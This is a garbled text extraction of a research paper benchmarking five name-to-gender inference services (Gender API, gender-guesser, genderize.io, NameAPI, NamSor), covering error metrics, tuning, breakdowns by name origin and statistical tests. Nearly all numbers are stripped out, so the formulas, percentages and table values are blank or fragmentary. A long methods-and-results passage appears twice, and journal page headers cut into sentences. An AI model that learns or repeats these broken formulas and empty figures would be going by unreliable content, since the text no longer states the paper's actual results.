matrix, wais ( ) introduced four performance metrics: errorcoded = fm+mf+mu+fu mm+fm+mf+ff+mu+fu , errorcodedwithoutna = fm+mf mm+fm+mf+ff , nacoded = mu+fu mm+fm+mf+ff+mu+fu , errorgenderbias = mf−fm mm+fm+mf+ff . the errors above are to be interpreted as follows: errorcoded treats a non-classification as a regular error and penalizes it in the same way as a misclassification, therefore it encodes the fraction of inaccuracies over the total number of assignments; errorcodedwithoutna measures the share of misclassifications over the total number of classifications while ignoring non-classifications; nacoded computes the proportion of non-classifications over the total number of assignments; errorgenderbias estimates the direction of the bias in gender prediction, indicating whether there are more females misclassified as male, or vice versa. if positive, then the estimated number of women is higher than in the real data. depending on the concrete usage of an algorithm, these metrics can be suitable or not. for instance, if not being able to assign a gender to a large number of names is acceptable while high prediction accuracy is essential, errorcodedwithoutna should be minimized. for most purposes, however, it is desirable to infer the gender for as many names as possible without treating non-classifications as a regular error. for this purpose we have defined two extensions of the metrics above. let w ∈[ , ]. we define the weightederror as weightederrorw = fm+mf+w∗(mu+fu) mm+fm+mf+ff+w∗(mu+fu) . for w = the weightederror equals errorcodedwithoutna and for w = we recover errorcoded exactly. for < w < we define a metric which penalizes misclassifications more than non-classifications. to clarify this further, consider the following examples of confusion matrices: santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. c = male female unknown male female c = male female unknown male female for both confusion matrices the fraction of inaccuracies over all assignments is the same (and equals . ), while c exhibits a smaller proportion of misclassifications, given than the number of non-classifications is larger than in c : errorcoded . (c ) = + + . ∗( + ) + + + + . ∗( + ) = . , errorcoded . (c ) = + + . ∗( + ) + + + + . ∗( + ) = . . another, even simpler possibility to penalize non-classifications without giving them the same importance as to misclassifications is to minimize a metric such as errorcodedwithoutna, which ignores the class ‘unknown’, while enforcing a constraint on nacoded, i.e. the rate of non-classifications. indeed any two metrics can be combined in this way. however, a disadvantage of this approach is that, for certain constraint values, there is no solution in the parameter space of a given gender inference model. thus, it makes sense to consider the distribution of error values depending on the tuning parameters before setting a definite constraint value. in our benchmarks, if the constraint cannot be satisfied on a training set, we have set the test set error to , which is the maximum achievable value. results prior to parameter tuning and benchmarking we have performed sample requests to all services in order to test potentially problematic cases, such as double names and diacritics. all services under study are sensitive towards accents and return different responses when e.g. applied to the names ‘josé marı́a’ and ‘josé maria’. however, namsor and nameapi show less sensitivity than gender api and genderize.io. for instance, nameapi returns the same value of the free parameter for both ‘jose’/‘josé’ and ‘maria’/‘marı́a’, respectively, but makes a difference when queried with a double name. the handling of double names is actually not completely transparent for most of the services. in the cases of ‘mary-jane’ or ‘jane-mary’, gender api returns a count value resulting of adding those for ‘mary’ and ‘jane’. this pattern persists when concatenating further names of the same gender, e.g. as in ‘mary-jane-sarah’. yet when name parts are joined with empty space instead of hyphen, the count values are not added, which shows that a different logic is being applied. the response of genderize.io also depends on the character connecting the name parts. this indicates a low level of semantical preprocessing of the data sources for both services. we have found examples displaying similar behavior in namsor, while nameapi seems to be less susceptible to this kind of artifacts. as pointed out in wais ( ), names used in social network profiles may contain arbitrary words or characters. this ‘bogus data’ is not filtered out of the underlying data base of genderize.io, resulting on stop words like ‘with’ or ‘i’ having a gender assigned to them. the same is true to a similar extent for gender api, while nameapi and namsor show a higher level of data curation. the package gender-guesser contains a priori only vetted names. both nameapi and namsor make use of the surname in order to provide a more accurate gender guess for names which depend significantly on the cultural context. we tested this on a few examples such as ‘andrea schmidt’ vs. ‘andrea bocelli’ or ‘rosario gonzález’ vs. ‘rosario giordano’; the two services responded with the expected gender categories, showing a correct identification of the surname with a particular country of origin. gender api and genderize.io do assign a gender to names like ‘andrea’ or ‘rosario’, but with lower accuracy values. when queried with unisex first names such as ‘mika’, ‘addison’, ‘ash’, or ’dakota’, nameapi returns ‘neutral’ or ‘unknown’. namsor, gender api, and genderize.io interpret some of these names as gender neutral by assigning a value of their free parameter close to , while gender-guesser also treats names as ambiguous via the qualifier mostly. / peerj comput. sci. reviewing pdf | (cs- : : : : :new may ) manuscript to be reviewedcomputer science for both confusion matrices the fraction of inaccuracies over all assignments is the same (and equals . ), while c exhibits a smaller proportion of misclassifications, given that the number of non-classifications is larger than in c : errorcoded . (c )= + + . ∗( + ) + + + + . ∗( + ) = . , errorcoded . (c )= + + . ∗( + ) + + + + . ∗( + ) = . . another even simpler possibility to penalize non-classifications without giving them the same importance as to misclassifications is to minimize a metric such as errorcodedwithoutna, which ignores the class ‘unknown’, while enforcing a constraint on nacoded, i.e., the rate of non-classifications. indeed any two metrics can be combined in this way. however, a disadvantage of this approach is that, for certain constraint values, there is no solution in the parameter space of a given gender inference model. thus, it makes sense to consider the distribution of error values depending on the tuning parameters before setting a definite constraint value. in our benchmarks, if the constraint cannot be satisfied on a training set, we have fixed the test set error to , which is the maximum achievable value. results prior to parameter tuning and benchmarking we have performed sample requests to all services in order to test potentially problematic cases, such as double names and diacritics. all services under study are sensitive towards accents and return different responses when e.g., applied to the names ‘josé maría’ and ‘josé maria’. however, namsor and nameapi show less sensitivity than gender api and genderize.io. for instance, nameapi returns the same value of the free parameter for both ‘jose’/‘josé’ and ‘maria’/‘maría’, respectively, but makes a difference when queried with a double name. the handling of double names is actually not completely transparent for most of the services. in the cases of ‘mary-jane’ or ‘jane-mary’, gender api returns a count value resulting of adding those for ‘mary’ and ‘jane’. this pattern persists when concatenating further names of the same gender, e.g., as in ‘mary-jane-sarah’. yet when name parts are joined with empty space instead of hyphen, the count values are not added, which shows that a different logic is being applied. the response of genderize.io also depends on the character connecting the name parts. this indicates a low level of semantical preprocessing santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the data sources for both services. we have found examples of similar behavior in namsor, while nameapi seems to be less susceptible to this kind of artifacts. as pointed out in wais ( ), names used in social network profiles may contain arbitrary words or characters. this ‘bogus data’ is not filtered out of the underlying data base of genderize.io, resulting in stop words like ‘with’ or ‘i’ having a gender assigned to them. the same is true to a similar extent for gender api, while nameapi and namsor show a higher level of data curation. the package gender-guesser contains a priori only vetted names. both nameapi and namsor make use of the surname in order to provide a more accurate gender guess for names which depend significantly on the cultural context. we tested this on a few examples such as ‘andrea schmidt’ vs. ‘andrea bocelli’ or ‘rosario gonzález’ vs. ‘rosario giordano’; the two services responded with the expected gender categories, showing a correct identification of the surname with a particular country of origin. gender api and genderize.io do assign a gender to names like ‘andrea’ or ‘rosario’, but with lower accuracy values. when queried with unisex first names such as ‘mika’, ‘addison’, ‘ash’, or ’dakota’, nameapi returns ‘neutral’ or ‘unknown’. namsor, gender api, and genderize.io interpret some of these names as gender neutral by assigning a value of their free parameter close to , while gender-guesser also treats names as ambiguous via the qualifier mostly. parameter tuning all methods under study with exception of gender-guesser return, in addition to the gender, one or two numerical parameters to estimate the quality of the inference. figure shows the distribution of these free parameters when using nameapi, namsor, gender api, and genderize.io to assign genders to all names in our test data set. for gender-guesser (not displayed) we have created one such parameter by setting it to . for responses ‘mostly_female’ or ‘mostly_male’ and for ‘female’ or ‘male’. figure a suggests that nameapi’s parameter confidence exhibits a bimodal distribution that peaks at around . , with a secondary maximum at (absolute certainty on the gender assignment). all names reach a confidence of at least . . figure b indicates that namsor assigns a gender with absolute certainty to most of the names in the data set, although some outliers are spread out at smaller values of the scale parameter. figures c and d show the two-dimensional parameter spaces of gender api and genderize.io: one parameter encodes the number of appearances of a name (denominated samples and count, respectively), and the other shows the confidence on its gender assignment (named accuracy and probability). most names fall in the bottom right region of high confidence and low number of counts. in general, there is no mathematical model that can be trained in the classical sense of machine learning. instead, for every service, we have ‘trained’ (or ‘tuned’) the algorithms by trying out randomly sampled parameter values. assuming that a gender classification might not be reliable under some given threshold for the confidence indicators, we have searched for those parameter values that minimize a certain error. a particular instantiation of a random grid of sampled parameters used for each service (except gender-guesser) is displayed as black dots in fig. as well. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . confidence a. nameapi . . . . . scale b. namsor samples accuracy c. gender api . . . . . . count probability d. genderize.io figure distribution of free parameters after querying the gender inference services with all f/m names from our test data set. (a) and (b) return one parameter, while (c) and (d) return two. in black, a particular instantiation of the grid of parameters per service used to perform parameter tuning is shown. full-size doi: . /peerjcs. /fig- benchmark setting we define a series of benchmarks to compare the methods under study. to begin with, we compute performance metrics using the default gender responses for all services, i.e., with no error minimization through parameter tuning (benchmark ). next, we introduce further benchmarks , , and , each of which concentrates on a particular scenario defined by conditions on the metrics to be optimized. all performed benchmarks are evaluated two-fold: (a) on the entire data set, and (b) differentiating between the five data sources as described in ‘assemblage of test data’. the latter case is particularly relevant e.g., for researchers in scientometrics looking for the most suitable gender inference algorithm for a particular data source such as pubmed, whereas the former is most appropriate when analyzing different data collections, as e.g., in holman, stuart-fox & hauser ( ). to better illustrate the role of the names’ origin, benchmark b is additionally broken down by geographical regions first and then by asian subregions, which turn out to be the most challenging. for benchmarks a, a, and a we run trials of -fold cross-validation. in each, we randomly select (at most) parameter values per service for training, and record the average error on the test sets with those parameters that minimized the respective error on santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the training sets. the tuning parameters as well as the training/test set splits are randomly selected with fixed seed numbers, thus ensuring reproducibility. in benchmarks b, b, and b we perform one trial of -fold cross-validation per service and data set, and record the average error on the test sets. since the individual data sets differ significantly in size, we have used at most parameters for the smaller data sets zbmath, genderize_r_authors and genderize_r_titles. for the larger data sets pubmed and wos, we have allowed at most and tuning parameters, respectively. finally, we apply several tests to assess the statistical significance of the observed differences. in the b-versions of our benchmarks, we first apply the non-parametric friedman test and then suitable post-hoc tests. we refrain from using anova, which is the usually recommended parametric alternative to evaluate multiple classifiers on multiple data sets, since the homogeneous covariance assumption is not satisfied across all services and data sets. in each benchmark, we compare the two best performers using suitable parametric or non-parametric tests for two classifiers. for more details on statistical significance tests suited for classification algorithms, see demšar ( ) and japkowicz & shah ( )[chapter ]. the code for the benchmark evaluations can be found in mihaljević & santamaría ( ). benchmark : default responses first, we use the gender inference services employing their default responses, i.e., considering all ‘female’ and ‘male’ gender attributions regardless of the value of the confidence parameters. benchmark a: entire data set we report the resulting figures for correct classifications, misclassifications, and non- classifications per service on the entire data set in table , whereas table shows values of the various quality metrics. gender api exhibits the lowest fraction of inaccuracies, at . %. it also achieves the smallest proportion of non-classified names, a mere %. for both metrics, namsor is the next best performer, closely followed by genderize.io. note that the databases of gender api and namsor are about one order of magnitude larger than those of gender-guesser and genderize.io, therefore it is not surprising that they achieve a larger ratio of classified names. incidentally, nameapi incurs a comparatively high non-classification error, despite its relatively extensive database. regarding the metrics that ignore predicted ‘unknowns’ altogether, python package gender-guesser achieves the best results, with only . % of misclassifications, followed by nameapi. this means that, when considering only the proper classifications in the confusion matrix, these services minimize the number of elements outside the diagonal. in other words, they produce the least number of misclassifications when ignoring the non-classifications. this is indicative of a high-quality data curation when incorporating names into the database. regarding the error in gender bias, the worst offenders are genderize.io and gender api, although in reverse directions; while the former wrongly identifies more men as women, the latter does the opposite, which means that results santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table confusion matrices for all services using their default responses without parameter tuning. mpred fpred upred (a) gender api m , f , (b) gender-guesser m , f , (c) genderize.io m , f , (d) nameapi m , f , (e) namsor m , f , table benchmark a: performance metrics for all services with their default gender assignments on the entire data set. the weightederror is computed with w = . . errorcoded errorcodedwithoutna errorgenderbias nacoded weightederror gender api . . − . . . gender-guesser . . . . . genderize.io . . . . . nameapi . . . . . namsor . . . . . obtained with gender api may underestimate the amount of females. finally, measured in terms of the weighted error with w = . , all services perform quite similarly, with gender api producing the lowest error. it is perhaps necessary to point out that, despite the high accuracy level of various gender predictions according to the services’ responses, some persons indeed remain misclassified. we can provide several examples extracted from our analysis: ‘dana’ is thought to be female with % accuracy by gender api, . confidence by nameapi, and . probability by genderize.io, while namsor more conservatively sets its scale to . . in fact, our test data set includes a male ‘dana’. similarly ‘michal’, the name of a female researcher, is classified as male with % accuracy by gender api, . confidence by nameapi, - . scale by namsor, and . probability by genderize.io. ultimately it all comes down to internal heuristics and the way each service weights the counts for a particular name from their multiple data sources. thus it is unavoidable to end up with a number of misclassified names, and this should be taken into account when making absolute claims about the validity of results based on these services. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. af ric a as ia eu ro pe a. gender api af ric a as ia eu ro pe . . . . . . b. gender-guesser af ric a as ia eu ro pe . . . . . . c. genderize.io af ric a as ia eu ro pe . . . . . d. nameapi af ric a as ia eu ro pe . . . . . . e. namsor figure boxplots depicting quartiles for the confidence parameters of the gender inference services, split by geographical regions africa, asia, and europe as returned by namsor’s origin api. panels (a), (b), (c), (d), and (e) display parameters accuracy of gender api, self-constructed confidence of gender- guesser, probability of genderize.io, confidence of nameapi and scale of namsor, respectively. the bottom and top of the colored boxes mark the first and third quartiles of the distribution; the line in the middle of the boxes indicates the median; the ends of the whiskers correspond to the lowest and highest data points within . interquartile range. full-size doi: . /peerjcs. /fig- benchmark b: analysis by name origin and data source next, we investigate the impact of the names’ origin on the performance of the services under evaluation. as described above, all services return a confidence parameter indicating the trustworthiness of the classification; recall that for python package gender-guesser we have created one such parameter by setting it to . for responses ‘mostly_female’ or ‘mostly_male’ and for ‘female’ or ‘male’. we investigate the confidence parameters for different geographical origins of the test names. the boxplots in fig. show statistics from the quartiles of the parameters’ distributions, split by the top regions predicted by namsor’s origin api. note that all services produce responses that are discernibly dependent on the names’ origin: the most confident gender predictions are for names of european origin, while asian names generally lead to a lower median and a higher deviation. the service nameapi displayed in fig. d stands out insofar as the medians of confidence values are lower than those of the other services, indicating a different kind of normalization. this is in accordance with the bimodal parameter distribution peaking at around . which is depicted in fig. a. there is also little difference between the median values for all three geographical regions, suggesting that nameapi’s confidence parameter is not as useful to discriminate among easy versus complex cases. it is also worth noting in fig. c that service genderize.io assigns gender to asian names with significantly higher confidence values than the other services: the median value for asian names is surprisingly almost as high as for european names. the lower confidence in gender assignments for asian names reported by almost all services suggests focusing on that case. as shown in fig. , which displays results broken down by asian subregions, names from eastern and southeastern asia yield significantly smaller values than other asian regions. this is to be expected, in particular due to chinese names for which the difficulty of inferring a gender of latin transcriptions is well known. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ce nt ra l a si a ea st er n as ia so ut h- ea st er n as ia so ut he rn a si a w es te rn a si a a. gender api ce nt ra l a si a ea st er n as ia so ut h- ea st er n as ia so ut he rn a si a w es te rn a si a . . . . . . b. gender-guesser ce nt ra l a si a ea st er n as ia so ut h- ea st er n as ia so ut he rn a si a w es te rn a si a . . . . . c. genderize.io ce nt ra l a si a ea st er n as ia so ut h- ea st er n as ia so ut he rn a si a w es te rn a si a . . . . . d. nameapi ce nt ra l a si a ea st er n as ia so ut h- ea st er n as ia so ut he rn a si a w es te rn a si a . . . . . . e. namsor figure boxplots depicting quartiles for the confidence parameters of the gender inference services for asian subregions as returned by namsor’s origin api, with boxplot settings as in fig. . full-size doi: . /peerjcs. /fig- table benchmark b, name origin: performance of all services with their default gender assign- ments in terms of the metrics errorcoded and errorcodedwithoutna, broken down by name origin. values are rounded to four decimal figures. errorcoded errorcodedwithoutna africa asia europe africa asia europe gender api . . . . . . gender-guesser . . . . . . genderize.io . . . . . . nameapi . . . . . . namsor . . . . . . nonetheless, while namsor and gender-guesser have almost no confidence in the gender inference of east asian names, gender api shows a notably high median value. nameapi and genderize.io again exhibit similar medians for all subregions, confirming that the values of their confidence parameters are decoupled from the names’ origins, and thus from the complexity of the assignment. this fact makes us doubt that nameapi’s confidence and genderize.io’s probability parameters are sufficiently significant. table quantifies errors incurred by the different services depending on the names’ origin. gender api achieves the best results for errorcoded, however its performance is strongly affected by the names’ origin, being one order of magnitude worse for asian ( % inaccuracies) than for european names ( %). namsor performs similarly for european ( %) and african names ( %), but is considerably worse for asian ones ( %). regarding the fraction of misclassifications (errorcodedwithoutna) we note that gender-guesser, with its small but highly accurate database, achieves a mere . % error in classifying european names, while for asian names the figure increases to %. generally speaking, we conclude that all services clearly show the challenging nature of inferring gender for asian names. next let us consider errors in gender inference depending on the source of the names as displayed in table . for both errors all services perform much worse on the wos data subset santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table benchmark b, data source: performance of all services with their default gender assignments in terms of the metrics errorcoded and errorcodedwithoutna, broken down by data source. values are rounded to four decimal figures. errorcoded errorcodedwithoutna zbmath genderize_r_ authors genderize_r_ titles pubmed wos zbmath genderize_r_ authors genderize_r_ titles pubmed wos gender api . . . . . . . . . . gender-guesser . . . . . . . . . . genderize.io . . . . . . . . . . nameapi . . . . . . . . . . namsor . . . . . . . . . . table benchmark a: minimization of inaccuracies constrained to a % misclassification error on the entire data set. displayed are the mean and standard deviation of the values of errorcoded for all ser- vices, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor mean . . . . . std . . . . . than on the others. this is in accordance with the fact that the wos collection incorporates a higher percentage of asian names, as evidenced by fig. . regardless, the results follow the general trend: gender api achieves the smallest fraction of inaccuracies for all data sources, whereas gender-guesser often beats other services in terms of misclassifications. overall we conclude that the breakdown of errors by data source is consistent with the analysis split by names’ origin. data sets composed of western names have a much larger chance of being correctly attributed a gender than asian ones. benchmark : minimization of inaccuracies constrained to a % misclassification error we measure the performance of all services with respect to the fraction of inaccuracies (errorcoded) under the constraint that at most % of all successfully classified names are misclassified as female or male, i.e., they fulfill errorcodedwithoutna < . . this is a realistic constellation for applications requiring the rate of misclassifications not to exceed a given threshold. benchmark a: entire data set we apply our parameter tuning procedure to minimize errorcoded on the entire data set and display the averaged test errors per service in table . in each of the runs of -fold cross-validation, gender api produces the lowest error, namsor the second lowest. in this scenario, it is possible to achieve an average inaccuracy rate under % over the whole data set while keeping the misclassification error under % with gender api. namsor and genderize.io achieve second place with average inaccuracy rates just under %. in order to assess whether the difference in performance is statistically significant, we apply a two-matched-samples t-test to the results of the two best services. since our data set is relatively large and the data sets have been obtained by random sampling, one needs to santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table benchmark b: minimization of inaccuracies constrained to a % misclassification error. dis- played are the values of errorcoded for all services and data sources, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor zbmath . . . . . genderize_r_authors . . . . . genderize_r_titles . . . . . pubmed . . . . . wos . . . . . show that the assumption of homogeneity of variance is satisfied prior to applying a t-test (see e.g., japkowicz & shah ( ) (p. ff)). levene’s test applied to the errors of gender api and namsor yields a large p-value of . , and so we conclude that there is (almost) no difference between their variances. the t-test returns a very small p-value < . , while the absolute value of cohen’s d-statistic is . . this means that gender api’s error is statistically significantly lower than namsor’s and the effect size is large. the parameter tuning procedure on the entire data set for this benchmark leads to optimal parameters close to the default case, maximizing the number of names that are assigned a gender; for instance, the optimal values for gender api’s accuracy and samples are and , respectively, while namsor’s scale is tuned to . . benchmark b: analysis by data source for the split analyses we perform one run of -fold cross-validation per service and data source; results are displayed in table and show that gender api is the best performer in all cases. incidentally, all services achieve one order of magnitude worse results on the data set wos than on the others. nameapi and gender-guesser did in fact repeatedly fail to satisfy the constraint, in which case we had to set the error to for the respective fold. we have applied the friedman test with the result that the difference in performance among services is statistically significant at significance level . . as a post-hoc test we have applied the nemenyi test in order to find out which classifiers actually differ. however, the nemenyi test is not powerful enough to detect statistical significance between any classifiers except gender api and nameapi. since we are particularly interested in the best performers, we have compared gender api and namsor using the sign test instead, which counts the number of data sets on which the one classifier outperforms the other. accordingly, gender api is significantly better than namsor at the confidence level . . benchmark : minimization of misclassifications constrained to a % non-classification rate next we evaluate the effectiveness for achieving correct classifications, i.e., we minimize the rate of misclassifications (errorcodedwithoutna) constrained to the amount of names that cannot be classified being lower than % of all assignments (nacoded < . ). this represents a rather frequent situation of wanting to incur as few misclassifications as possible, while at the same time being able to assign a gender to at least a pre-defined fraction of the evaluated names. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we have applied the sign test to the test errors in the first trial, since multiple trials violate the independent domain assumption. gender api outperforms namsor in seven of folds but this is not significant in terms of the sign test which would require eight folds. table benchmark a: minimization of misclassifications constrained to a % non-classification rate on the entire data set. displayed are the mean and the standard deviation of errorcodedwithoutna for all services, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor mean . . . . . std . . . . . table benchmark b: minimization of misclassifications constrained to a % non-classification rate. displayed are the values of errorcodedwithoutna for all services and data sources, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor zbmath . . . genderize_r_authors . . . . . genderize_r_titles . . . . . pubmed . . . . . wos . . . . benchmark a: entire data set as shown in table , gender api outperforms the other services with a . % misclassification rate, followed by namsor with . % and genderize.io with . %. to achieve these results, the three services need to be tuned to optimal parameters with higher values of confidence (roughly accuracy > and samples > , ; scale > . ; probability > . and count > , , respectively). since the variances of gender api and namsor are not similar, a t-test cannot be applied to measure the difference between the two best performers . however, it can be applied to the comparison of gender api and genderize.io, with the result that gender api outperforms genderize.io significantly with large effect size. benchmark b: analysis by data source for most of the analyzed data sources gender api outperforms all other services; error figures are displayed in table . on names from the pubmed collection, gender api and genderize.io are equally good; on the zbmath subset, gender api and namsor achieve a perfect score. again, all services perform one order of magnitude worse on names from wos than on the other subsets. nameapi did not satisfy the constraint on various folds, gender-guesser in fact on none of them. as in benchmark b, the friedman test shows statistical significance at significance level . . neither the nemenyi test nor the sign test confirm significance between the performance of gender api and namsor at level . . we conclude that none of the tests considered suitable for comparing gender api and namsor are able to confirm that gender api is statistically significantly better in this case. benchmark : minimization of the weighted error with w = . finally we analyze the case of minimizing the weighted error with w = . , namely the metric that treats all inaccuracies (misclassifications and non-classifications) as errors, but santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table benchmark a: minimization of the weighted error with weight w = . . displayed are the mean and the standard deviation of the values of weightederror for all services, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor mean . . . . . std . . . . . table benchmark b: minimization of the weighted error with weight w = . . displayed are the values of weightederror for all services and data sources, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor zbmath . . . . . genderize_r_authors . . . . . genderize_r_titles . . . . . pubmed . . . . . wos . . . . . puts five times more weight into the former. this corresponds to an intermediate situation between benchmarks and , and the approach has the flexibility of allowing a continuous range of values for the weight w, depending on the particular needs of each analysis. benchmark a: entire data set the best results are achieved by gender api and namsor with weighted error values of . and . , respectively, as shown in table . since the variance of the two best performers is almost equal, we can apply the t-test, which yields statistical significance at significance level . . also, cohen’s d-statistic confirms that the difference in performance is practically relevant. as expected, the parameter tuning procedure on the entire data set leads to optimal parameters between those computed for the previous two benchmarks; for instance, the optimal values for gender api’s accuracy and samples are and , , respectively, while namsor’s scale is tuned to . . benchmark b: analysis by data source in table we present results from minimizing weightederror with weight w = . for all services and data sources. gender api is the best performing service on all data sets; namsor reaches the second best values on four out of five data sources. the friedman test shows that the performances are statistically significant at significance level of . . furthermore, the sign test shows that gender api is significantly better than namsor at significance level . . discussion name-based gender inference poses numerous challenges. to name a few, the association of a name with gender depends on the cultural and regional context, hence relying on the first name only can be highly error-prone. transliteration from other alphabets into the santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. latin one is known to lead to significant losses of information, thereby excluding entire populations from a reliable classification. incidentally, the gender of some names might depend not only on culture, but also on historical epoch, and so there exist names that were e.g., typically male in the past and are nowadays female or unisex. furthermore, first names are per se embedded into the gender binary, hence this approach reinforces a non-inclusive gender concept and further marginalizes individuals that do not identify as women or men. clearly, the best way to enrich personal data with this type of demographic information is to ask for self-identification. that would not only increase the correctness of the data; it is also to be preferred under ethical considerations, since it avoids the offensiveness of assigning categories to individuals, while allowing for inclusion of identities beyond the gender binary. self-identification is not feasible though in large-scale studies of historical data that are typical for bibliometric analyses. thus the usage of automated methods to infer gender from names or from alternative available details is unavoidable. for a thorough discussion of the ethics of gender identification, see matias ( ) and references therein. notwithstanding the above caveats, we have performed a comprehensive comparison of available gender inference tools, testing five services on a manually labeled data set containing , names, of which , have a definite gender and are subjected to our analyses. for our evaluations, it would have been desirable to use an open collection of names with labels obtained through self-identification. we are not aware of such a set, thus we have used data based on judgments of third parties. as described in the section ‘assemblage of test data’ we have corrected a non-trivial amount of gender assignments, which unfortunately does not preclude potential remaining classification mistakes. making the test data set public might help to correct them. furthermore, we have assessed the geographical diversity of our test names, concluding that approximately half of them are of european origin, slightly less than half are asian, and the remaining % are african. names of persons from the american and australian continents are considered to descend from these three main regions. we deem this distribution to be appropriate for the task at hand. we have devised and run various benchmarks to compare all five inference services in several scenarios. in particular, we have computed all performance metrics using the default responses without any further tuning. we have studied the default responses broken down by geographical origin of names and by data source. additionally, we have performed parameter tuning to search for the optimal values of the confidence indicators that lead to minimization of misclassification or inaccuracy rates, while constraining the maximum error on the other quantity. we have broken down these analyses by data source as well. finally, we have applied various tests to measure whether the observed differences in performance are statistically significant. python package gender-guesser achieves the lowest misclassification rate without parameter tuning for the entire data set, introducing also the smallest gender bias. at the same time it shows poor performance in terms of non-classifications, which is understandable given its comparatively small data base. as the only completely free service with open data and logic, we reckon that it can be useful as a first step of a multi-stage santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. considering the problems arising with middle names, as described for gender api and namsor, it might make sense to drop them, or to query with only the first name when the genders of first and middle are in disagreement. gender inference procedure. gender api is the best performer in terms of fraction of inaccuracies, and also in proportion of non-classifications. when breaking down results without parameter tuning by names’ origin we find out that all services perform at least one order of magnitude better on names of european origin than on asian names. in particular, this translates to poorer results on the wos names subset, which is the less eurocentric collection of all analyzed data sources. this confirms that assessments of errors in gender inference studies should be made with particular care when the cultural makeup of the analyzed names is unknown. for instance, the genderizer data subsets employed in the analysis of wais ( ) contain predominantly western records, which is possibly at the root of the good results produced by a genderize.io service that, as we show, is not particularly well suited for inferring the gender of asian names. in modern scholarly publications, the share of authors of asian origin is significant though and thus this caveat needs to be addressed. gender api typically achieves the best results after performing parameter tuning to optimize for particular scenarios. it is noteworthy to recall that, in contrast to namsor and nameapi, gender api uses first names only. using the tuned parameters of gender api, it is possible to obtain a rate of inaccuracies of . % constrained to not more of % of names being misclassified, a result significantly better than that achieved by the second best service namsor. likewise, the misclassification error can be made as low as . % while still retaining a classification label for at least % of the entire data set. next in performance is service namsor, closely followed by genderize.io, both of which achieve a misclassification rate under % in that latter scenario. our results indicate that analyses based on gender predictions by these methods are to be considered as more reliable than regular queries to country censuses or birth name lists. the addition of further benchmark settings based on supplementary performance metrics might be of interest. for instance, an appropriate measure would be the area under the roc curve (auc), which is particularly useful when one of the outcome classes is skewed, as is expected for authorships randomly drawn from databases in stem disciplines. a disadvantage of the commercial services though is the lack of transparency regarding their data sources, specifically how records are gathered and processed. furthermore, the algorithms behind the gender assignments are closed, too, while explanations are usually provided only on the level of technical usage, based on simple examples such as ‘john smith’. both aspects hamper efforts towards reproducibility of results. at the same time, given the substantial cost of some of the services, a better treatment of specific peculiarities like double names would be expected . to give another example of trivial errors, nameapi classifies ‘paul pinsky’ as female with confidence . , while ‘paul pinsky’ or ‘paul pinsky’ are returned as male with confidence . . hence, we recommend potential users to thoroughly test any given service with comprehensive examples before going into production. our benchmarks and tests aim to provide first solid evidence of the services’ capabilities. for the presented benchmarks we have restricted to names containing at least a first and a last name. yet the last name may sometimes suffice to infer the gender with high probability; this is e.g., the case for many (though not all) names from russia or poland. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for those services that can handle them, it would be interesting to benchmark on a test set consisting of surnames only. additionally, our data set contains only names in latin characters although various services can handle (some) non-latin alphabets, so it might be desirable to extend the data set in this direction as well. furthermore, one could expand the study to include more samples of the same first name and test the dependency of gender inference on the last name. lastly, there exist several more code packages or web services of interest: r package gender by lincoln mullen (mullen, ) utilizes various openly available sources of first names with time range as an additional feature. as explained in blevins & mullen ( ), for research of a longer time span, ‘‘the changing nature of naming practices’’ might need to be taken into consideration. conclusion the determination of a person’ gender based solely on their name is not straightforward, yet it is a relevant task for plenty of applications, including but not limited to studies of women’s representation in tech, media, or academia. in particular, bibliometric analyses of scientific publications in various academic fields have mostly made use of compiled lists of names to label authors of articles as male or female. less attention has been paid, though, to the quantification of the several errors that one can incur when doing so, or to the advantages of choosing one or another gender assignment method depending on the requirements of the analysis at hand. our comparison of five gender inference services in terms of various performance metrics such as inaccuracy, misclassification, and non-classification error rates provides a solid estimation of the accuracy to be expected in name-to-gender inference tasks. applying these metrics to our data set, which we break down according to the names’ geographical origin and data source, we estimate the errors incurred by the services according to the two variables. by performing cross-validated, randomized parameter tuning on a large genderized data set of scientific authors we demonstrate that with three of the surveyed services it is possible to guess the correct gender of more than % of names for which a female or male label is returned, while simultaneously leaving less than % of records unclassified. our framework can be trivially extended to account for further gender inference methods. acknowledgements we thank casper strømgren for granting us unlimited access to genderize.io and markus perl for extending us a discount offer for gender api. we are indebted to elian carsenat for allowing us to freely access namsor’s gender and origin apis. we are grateful to researchers vincent larivière, cassidy sugimoto, and kevin bonham for sharing their labeled gender data. we thank marco tullney for comments on the submitted version. we acknowledge and 